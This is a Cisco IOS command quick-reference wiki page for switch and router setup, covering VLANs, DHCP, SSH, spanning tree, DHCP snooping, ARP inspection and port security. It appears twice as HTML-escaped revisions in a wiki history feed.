&amp;lt;pre&amp;gt;&lt;br /&gt;
configure terminal&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Disable DNS Lookup on Typos ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
no ip domain-lookup&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Set MOTD Banner ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
banner motd MESSAGEHERE&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Set Hostname ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
hostname HOSTNAME&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Line Configuration ==&lt;br /&gt;
&lt;br /&gt;
=== Console Line ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
line con 0&lt;br /&gt;
 password itsasecret&lt;br /&gt;
 login&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== VTY Lines ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
line vty 0 15&lt;br /&gt;
 password itsasecret&lt;br /&gt;
 login&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Interface Configuration ==&lt;br /&gt;
&lt;br /&gt;
=== Interface Selection ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
interface vlan 1&lt;br /&gt;
interface fa0/1&lt;br /&gt;
interface range fa0/2-3&lt;br /&gt;
interface range fa0/2-3,g0/1&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Enable Interface ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
no shutdown&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Assign IPv4 Address ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ip address 192.168.0.1 255.255.255.0&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== VLAN Configuration ==&lt;br /&gt;
&lt;br /&gt;
=== Create / Configure VLAN ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
vlan 10&lt;br /&gt;
 name MyAwesomeVlan&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Switchport Configuration ==&lt;br /&gt;
&lt;br /&gt;
=== Access Port ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
switchport mode access&lt;br /&gt;
switchport access vlan 10&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Trunk Port ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
switchport trunk encapsulation dot1q&lt;br /&gt;
switchport mode trunk&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Trunk Allowed VLANs ===&lt;br /&gt;
 switchport trunk allowed vlan 10,20,33,99&lt;br /&gt;
&lt;br /&gt;
=== Trunk Native VLANs ===&lt;br /&gt;
switchport trunk native vlan 99&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== IPv6 Interface Configuration ==&lt;br /&gt;
&lt;br /&gt;
=== Assign IPv6 Address ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ipv6 address 2001:DB8:CAFE:1::1/64&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Assign Link-Local Address ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ipv6 address fe80::1 link-local&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Remove IPv6 Addresses ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
no ipv6 address 2001:DB8:CAFE:1::1/64&lt;br /&gt;
no ipv6 address&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== IPv6 ND Other-Config Flag ===&lt;br /&gt;
Set the &amp;quot;Other Configuration&amp;quot; flag in IPv6 Neighbor Discovery (ND) messages. &lt;br /&gt;
- When enabled, it signals to IPv6 hosts that they should obtain additional configuration information (such as DNS server addresses) via DHCPv6, even if they have a stateless autoconfigured address.&lt;br /&gt;
&lt;br /&gt;
 ipv6 nd other-config-flag&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== DHCP ==&lt;br /&gt;
&lt;br /&gt;
=== Configure a DHCP Server on a Cisco Router ===&lt;br /&gt;
Assigns IP addresses automatically to clients on a network.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ip dhcp excluded-address 192.168.1.1 192.168.1.10&lt;br /&gt;
! Exclude addresses that should not be assigned dynamically&lt;br /&gt;
&lt;br /&gt;
ip dhcp pool LAN_POOL&lt;br /&gt;
 network 192.168.1.0 255.255.255.0&lt;br /&gt;
 default-router 192.168.1.1&lt;br /&gt;
 dns-server 8.8.8.8 8.8.4.4&lt;br /&gt;
 lease 7&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;excluded-address&#039;&#039;: Prevents certain IPs from being assigned (like static IPs for servers or routers).  &lt;br /&gt;
* &#039;&#039;network&#039;&#039;: Defines the subnet for DHCP clients.  &lt;br /&gt;
* &#039;&#039;default-router&#039;&#039;: Sets the gateway IP for clients.  &lt;br /&gt;
* &#039;&#039;dns-server&#039;&#039;: Specifies DNS servers for clients.  &lt;br /&gt;
* &#039;&#039;lease&#039;&#039;: Duration the IP is valid (in days).  &lt;br /&gt;
&lt;br /&gt;
=== Configure DHCP Relay (IP Helper) ===&lt;br /&gt;
Forwards DHCP requests from clients to a remote DHCP server.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
interface GigabitEthernet0/1&lt;br /&gt;
 ip address 192.168.1.1 255.255.255.0&lt;br /&gt;
 ip helper-address 192.168.2.100&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;ip helper-address&#039;&#039;: IP of the DHCP server to forward requests to.  &lt;br /&gt;
* Needed when the server is on a different subnet.  &lt;br /&gt;
&lt;br /&gt;
=== Verify DHCP Status ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show ip dhcp binding      ! Shows assigned IP addresses&lt;br /&gt;
show ip dhcp pool         ! Shows pool usage and statistics&lt;br /&gt;
show running-config       ! Check DHCP configuration&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Best Practices ===&lt;br /&gt;
* Exclude static IP addresses from DHCP pools.  &lt;br /&gt;
* Use &#039;&#039;DHCP relay&#039;&#039; when clients and server are on different subnets.  &lt;br /&gt;
* Monitor DHCP bindings to prevent IP conflicts.  &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Spanning Tree ==&lt;br /&gt;
&lt;br /&gt;
=== Enable PortFast on an interface ===&lt;br /&gt;
Use PortFast on edge/access ports that connect to end devices.&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/1&lt;br /&gt;
  spanning-tree portfast&lt;br /&gt;
&lt;br /&gt;
=== Enable PortFast globally ===&lt;br /&gt;
Enables PortFast on all access ports.&lt;br /&gt;
&lt;br /&gt;
 spanning-tree portfast default&lt;br /&gt;
&lt;br /&gt;
=== Enable PortFast on a trunk (use with caution) ===&lt;br /&gt;
Only use when the trunk connects to a single end device (not another switch).&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/1&lt;br /&gt;
  spanning-tree portfast trunk&lt;br /&gt;
&lt;br /&gt;
=== Verify PortFast status ===&lt;br /&gt;
&lt;br /&gt;
 show spanning-tree interface GigabitEthernet0/1 detail&lt;br /&gt;
&lt;br /&gt;
=== Disable PortFast on an interface ===&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/1&lt;br /&gt;
  no spanning-tree portfast&lt;br /&gt;
&lt;br /&gt;
=== Best Practice: Enable BPDU Guard with PortFast ===&lt;br /&gt;
Shuts down the port if a BPDU is received, protecting against loops.&lt;br /&gt;
&lt;br /&gt;
Per interface:&lt;br /&gt;
 interface GigabitEthernet0/1&lt;br /&gt;
  spanning-tree portfast&lt;br /&gt;
  spanning-tree bpduguard enable&lt;br /&gt;
&lt;br /&gt;
Globally:&lt;br /&gt;
 spanning-tree portfast default&lt;br /&gt;
 spanning-tree bpduguard default&lt;br /&gt;
&lt;br /&gt;
=== Notes ===&lt;br /&gt;
* Do &#039;&#039;&#039;not&#039;&#039;&#039; enable PortFast on ports connected to other switches&lt;br /&gt;
* Recommended for access/edge ports&lt;br /&gt;
* Incorrect use can cause Layer 2 loops&lt;br /&gt;
&lt;br /&gt;
== DHCP Snooping ==&lt;br /&gt;
&lt;br /&gt;
=== Enable DHCP Snooping globally ===&lt;br /&gt;
Enable DHCP Snooping for the switch.&lt;br /&gt;
&lt;br /&gt;
 ip dhcp snooping&lt;br /&gt;
&lt;br /&gt;
=== Enable DHCP Snooping on a VLAN ===&lt;br /&gt;
DHCP Snooping only operates on specified VLANs.&lt;br /&gt;
&lt;br /&gt;
 ip dhcp snooping vlan 10&lt;br /&gt;
 ip dhcp snooping vlan 20&lt;br /&gt;
&lt;br /&gt;
=== Configure trusted interfaces ===&lt;br /&gt;
Mark uplinks or ports connected to legitimate DHCP servers as trusted.&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/1&lt;br /&gt;
  ip dhcp snooping trust&lt;br /&gt;
&lt;br /&gt;
=== Untrusted interfaces (default) ===&lt;br /&gt;
Access ports are untrusted by default. DHCP server responses are blocked.&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/2&lt;br /&gt;
  no ip dhcp snooping trust&lt;br /&gt;
&lt;br /&gt;
=== Configure DHCP Snooping rate limiting ===&lt;br /&gt;
Protect against DHCP starvation attacks. Limits to 15 DHCP packets per second, will mark port as violating otherwise.&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/2&lt;br /&gt;
  ip dhcp snooping limit rate 15&lt;br /&gt;
&lt;br /&gt;
=== Verify DHCP Snooping status ===&lt;br /&gt;
&lt;br /&gt;
 show ip dhcp snooping&lt;br /&gt;
 show ip dhcp snooping binding&lt;br /&gt;
&lt;br /&gt;
=== Disable DHCP Snooping ===&lt;br /&gt;
&lt;br /&gt;
 no ip dhcp snooping&lt;br /&gt;
 no ip dhcp snooping vlan 10&lt;br /&gt;
&lt;br /&gt;
=== Notes ===&lt;br /&gt;
* Only trusted ports can send DHCP server messages&lt;br /&gt;
* Access ports should remain untrusted&lt;br /&gt;
* Commonly used with &#039;&#039;&#039;Dynamic ARP Inspection&#039;&#039;&#039; and &#039;&#039;&#039;IP Source Guard&#039;&#039;&#039;&lt;br /&gt;
* Requires correct VLAN configuration to function properly&lt;br /&gt;
&lt;br /&gt;
== Dynamic ARP Inspection (DAI) ==&lt;br /&gt;
&lt;br /&gt;
=== Enable DAI globally ===&lt;br /&gt;
Dynamic ARP Inspection requires DHCP Snooping to be enabled.&lt;br /&gt;
&lt;br /&gt;
 ip arp inspection&lt;br /&gt;
&lt;br /&gt;
=== Enable DAI on a VLAN ===&lt;br /&gt;
Specify which VLANs should be protected.&lt;br /&gt;
&lt;br /&gt;
 ip arp inspection vlan 10&lt;br /&gt;
 ip arp inspection vlan 20&lt;br /&gt;
&lt;br /&gt;
=== Configure trusted interfaces ===&lt;br /&gt;
Trust uplinks and ports connected to other switches or routers.&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/1&lt;br /&gt;
  ip arp inspection trust&lt;br /&gt;
&lt;br /&gt;
=== Untrusted interfaces (default) ===&lt;br /&gt;
Access ports are untrusted by default. Invalid ARP packets are dropped.&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/2&lt;br /&gt;
  no ip arp inspection trust&lt;br /&gt;
&lt;br /&gt;
=== Configure ARP rate limiting ===&lt;br /&gt;
Protect against ARP flooding attacks.&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/2&lt;br /&gt;
  ip arp inspection limit rate 15&lt;br /&gt;
&lt;br /&gt;
=== Verify DAI status ===&lt;br /&gt;
&lt;br /&gt;
 show ip arp inspection&lt;br /&gt;
 show ip arp inspection vlan&lt;br /&gt;
 show ip arp inspection interfaces&lt;br /&gt;
&lt;br /&gt;
=== Disable DAI ===&lt;br /&gt;
&lt;br /&gt;
 no ip arp inspection&lt;br /&gt;
 no ip arp inspection vlan 10&lt;br /&gt;
&lt;br /&gt;
=== Notes ===&lt;br /&gt;
* Requires &#039;&#039;&#039;DHCP Snooping&#039;&#039;&#039; to build the ARP binding table&lt;br /&gt;
* Only trusted ports can send unlimited ARP replies&lt;br /&gt;
* Access ports should remain untrusted&lt;br /&gt;
* Commonly deployed with &#039;&#039;&#039;PortFast + BPDU Guard&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
== Port Security ==&lt;br /&gt;
&lt;br /&gt;
=== Activate Port Security on an interface ===&lt;br /&gt;
The port cannot be a dynamic port:&lt;br /&gt;
 switchport mode access&lt;br /&gt;
Enable Port Security&lt;br /&gt;
 switchport port-security&lt;br /&gt;
&lt;br /&gt;
=== Set the maximum number of mac addresses that can be used on that port ===&lt;br /&gt;
 switchport port-security maximum 1&lt;br /&gt;
&lt;br /&gt;
=== Whitelist a specific mac address ===&lt;br /&gt;
 switchport port-security mac-address 0001.6311.E7BC&lt;br /&gt;
&lt;br /&gt;
=== Enable sticky mode to automatically learn mac addresses ===&lt;br /&gt;
 switchport port-security mac-address sticky&lt;br /&gt;
&lt;br /&gt;
=== Port Security Violation Modes ===&lt;br /&gt;
==== Protect ====&lt;br /&gt;
Silently drops packets from unknown MAC addresses while keeping the port up and generating no alerts.&lt;br /&gt;
 switchport port-security violation protect&lt;br /&gt;
&lt;br /&gt;
==== Restrict ====&lt;br /&gt;
Drops packets from unknown MAC addresses and logs the violation while incrementing the security counter.&lt;br /&gt;
 switchport port-security violation restrict&lt;br /&gt;
&lt;br /&gt;
==== Shutdown ====&lt;br /&gt;
Immediately disables the port when an unknown MAC address is detected, placing it into an error-disabled state.&lt;br /&gt;
 switchport port-security violation shutdown&lt;br /&gt;
&lt;br /&gt;
=== Port Security Aging ===&lt;br /&gt;
==== Enable static aging on an interface ====&lt;br /&gt;
 switchport port-security aging static&lt;br /&gt;
&lt;br /&gt;
==== Enable timed aging on an interface (5 minutes) ====&lt;br /&gt;
 switchport port-security aging time 5&lt;/div&gt;</summary>
		<author><name>50.220.241.211</name></author>
	</entry>
	<entry>
		<id>https://wiki.luccapirovano.com/index.php?title=Cisco_Commands&amp;diff=1075</id>
		<title>Cisco Commands</title>
		<link rel="alternate" type="text/html" href="https://wiki.luccapirovano.com/index.php?title=Cisco_Commands&amp;diff=1075"/>
		<updated>2026-02-05T18:48:34Z</updated>

		<summary type="html">&lt;p&gt;50.220.241.211: /* Trunk VLAN Settings */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;= Cisco IOS Command Reference =&lt;br /&gt;
&lt;br /&gt;
A quick-reference guide for common Cisco IOS commands on switches and routers.&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== System &amp;amp; Routing Basics ==&lt;br /&gt;
&lt;br /&gt;
=== Enable IPv4 Routing (Layer 3 Switches) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ip routing&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Enable IPv6 Routing (Routers) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ipv6 unicast-routing&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Device &amp;amp; System Information ==&lt;br /&gt;
&lt;br /&gt;
=== Show MAC Address Table ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show mac address-table&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Show OS and Device Version ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show version&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Show Logged-in Users ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show users&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Show Files ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
dir&lt;br /&gt;
dir nvram:&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Configuration Files ==&lt;br /&gt;
&lt;br /&gt;
=== Show Configurations ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show running-config&lt;br /&gt;
show startup-config&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Show Interface Config ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show run interface g0/0&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Filter Running Config (grep-like) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show run | include {searchterm}&lt;br /&gt;
show run | begin {searchterm}&lt;br /&gt;
show run | section {section-name}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Save Running Config ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
copy running-config startup-config&lt;br /&gt;
copy run start&lt;br /&gt;
wr&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== User Privileges &amp;amp; Security ==&lt;br /&gt;
&lt;br /&gt;
=== Enter Privileged Mode ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
enable&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Set Encrypted Enable Password ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
enable secret ThisisaSecret&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Encrypt Plaintext Passwords (Weak Encryption)  ===&lt;br /&gt;
You can decrypt these with publicly available tools like https://keydecryptor.com/decryption-tools/cisco7&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
service password-encryption&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Interface &amp;amp; Network Status ==&lt;br /&gt;
&lt;br /&gt;
=== Interface IP Summary ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show ip interface brief&lt;br /&gt;
show ipv6 interface brief&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Interface IP Summary (filtered to only interfaces with IPs) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show ip interface brief | exclude unassigned&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
=== Routing Table ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show ip route&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== VLAN &amp;amp; Switching ==&lt;br /&gt;
&lt;br /&gt;
=== Show VLANs ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show vlan brief&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Show Interface VLAN Details ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show interface g0/1 switchport&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Show Trunk Interfaces ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show int trunk&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Clear Tables ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
clear mac address-table&lt;br /&gt;
clear arp-cache&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Telnet &amp;amp; Remote Access ==&lt;br /&gt;
&lt;br /&gt;
=== Connect via Telnet ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
connect {DeviceName}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Show Hosts &amp;amp; Sessions ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show hosts&lt;br /&gt;
show sessions&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Disconnect Session ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
disconnect {DeviceName}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Suspend Active Session ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Ctrl+Shift+6, then x&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== SSH Configuration ==&lt;br /&gt;
&lt;br /&gt;
=== Basic SSH Setup ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ip domain-name cisco.com&lt;br /&gt;
crypto key generate rsa&lt;br /&gt;
ip ssh version 2&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Remove RSA Keys ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
crypto key zeroize rsa&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Create Local User ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
username admin secret ccna&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Set Default Gateway ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ip default-gateway 192.168.10.1&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Enable SSH on VTY Lines ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
line vty 0 15&lt;br /&gt;
 transport input ssh&lt;br /&gt;
 login local&lt;br /&gt;
 exit&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Global Configuration Mode ==&lt;br /&gt;
&lt;br /&gt;
=== Enter Global Config ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
configure terminal&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Disable DNS Lookup on Typos ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
no ip domain-lookup&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Set MOTD Banner ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
banner motd MESSAGEHERE&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Set Hostname ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
hostname HOSTNAME&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Line Configuration ==&lt;br /&gt;
&lt;br /&gt;
=== Console Line ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
line con 0&lt;br /&gt;
 password itsasecret&lt;br /&gt;
 login&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== VTY Lines ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
line vty 0 15&lt;br /&gt;
 password itsasecret&lt;br /&gt;
 login&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Interface Configuration ==&lt;br /&gt;
&lt;br /&gt;
=== Interface Selection ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
interface vlan 1&lt;br /&gt;
interface fa0/1&lt;br /&gt;
interface range fa0/2-3&lt;br /&gt;
interface range fa0/2-3,g0/1&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Enable Interface ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
no shutdown&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Assign IPv4 Address ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ip address 192.168.0.1 255.255.255.0&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== VLAN Configuration ==&lt;br /&gt;
&lt;br /&gt;
=== Create / Configure VLAN ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
vlan 10&lt;br /&gt;
 name MyAwesomeVlan&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Switchport Configuration ==&lt;br /&gt;
&lt;br /&gt;
=== Access Port ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
switchport mode access&lt;br /&gt;
switchport access vlan 10&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Trunk Port ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
switchport trunk encapsulation dot1q&lt;br /&gt;
switchport mode trunk&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Trunk Allowed VLANs ===&lt;br /&gt;
switchport trunk allowed vlan 10,20,33,99&lt;br /&gt;
&lt;br /&gt;
=== Trunk Native VLANs ===&lt;br /&gt;
switchport trunk native vlan 99&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== IPv6 Interface Configuration ==&lt;br /&gt;
&lt;br /&gt;
=== Assign IPv6 Address ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ipv6 address 2001:DB8:CAFE:1::1/64&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Assign Link-Local Address ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ipv6 address fe80::1 link-local&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Remove IPv6 Addresses ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
no ipv6 address 2001:DB8:CAFE:1::1/64&lt;br /&gt;
no ipv6 address&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== IPv6 ND Other-Config Flag ===&lt;br /&gt;
Set the &amp;quot;Other Configuration&amp;quot; flag in IPv6 Neighbor Discovery (ND) messages. &lt;br /&gt;
- When enabled, it signals to IPv6 hosts that they should obtain additional configuration information (such as DNS server addresses) via DHCPv6, even if they have a stateless autoconfigured address.&lt;br /&gt;
&lt;br /&gt;
 ipv6 nd other-config-flag&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== DHCP ==&lt;br /&gt;
&lt;br /&gt;
=== Configure a DHCP Server on a Cisco Router ===&lt;br /&gt;
Assigns IP addresses automatically to clients on a network.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ip dhcp excluded-address 192.168.1.1 192.168.1.10&lt;br /&gt;
! Exclude addresses that should not be assigned dynamically&lt;br /&gt;
&lt;br /&gt;
ip dhcp pool LAN_POOL&lt;br /&gt;
 network 192.168.1.0 255.255.255.0&lt;br /&gt;
 default-router 192.168.1.1&lt;br /&gt;
 dns-server 8.8.8.8 8.8.4.4&lt;br /&gt;
 lease 7&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
